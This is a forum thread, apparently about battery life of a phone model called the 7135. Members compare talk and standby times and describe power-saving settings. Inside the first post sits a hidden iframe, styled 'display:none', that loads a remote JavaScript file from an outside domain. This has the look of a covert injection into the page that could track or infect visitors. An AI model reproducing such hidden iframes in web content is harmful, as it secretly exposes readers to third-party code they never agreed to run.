Poll: How much digital talk time do you average from your fully charged 7135?

+ Reply to Thread

How much talk time are you getting from your 7135?

Rate it and compare.

Update: According to MC, I have gotten ~100 minutes average talk time over the last few days, not 89 as I had originally posted in this poll. Unfortunately, I know of no way to modify my poll answer to reflect that. Still, I am amazed that other folks are reporting 3+ hours of talk time. With only 7 responses to date, this is still a small sampling <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I wish I could answer one of those! soon. very soon.
    iPhone therefore iAm.

I'm not sure how to answer this poll...for example, many days I prolly log 2 hours talk time; others perhaps less than 1 hour. Since I've never fully discharged the battery, perhaps I could have gone on for hours more. How about having 2 members set up a call between them under controlled conditions (fully charged, digital signal, etc.) and see how long they can stay in contact?

Keep in mind that talk time is directly related to standby time and PDA usage time. With that bright screen sucking battery power, I have found the first day I got 50 min. talktime + 14 hours standby + lots and lots of PDA usage with the screen set to max brightness.

I did energy conservation - turned down brightness, turned off GPS, turned off IR receive standby, etc.

Today I got 20 min talktime, 15 hours standby, lots and lots of PDA usage and still have 2 bars (1 big and 1 small) which looks to me like maybe 1/3 power. Better. But still not up to spec. By a long shot.

MDL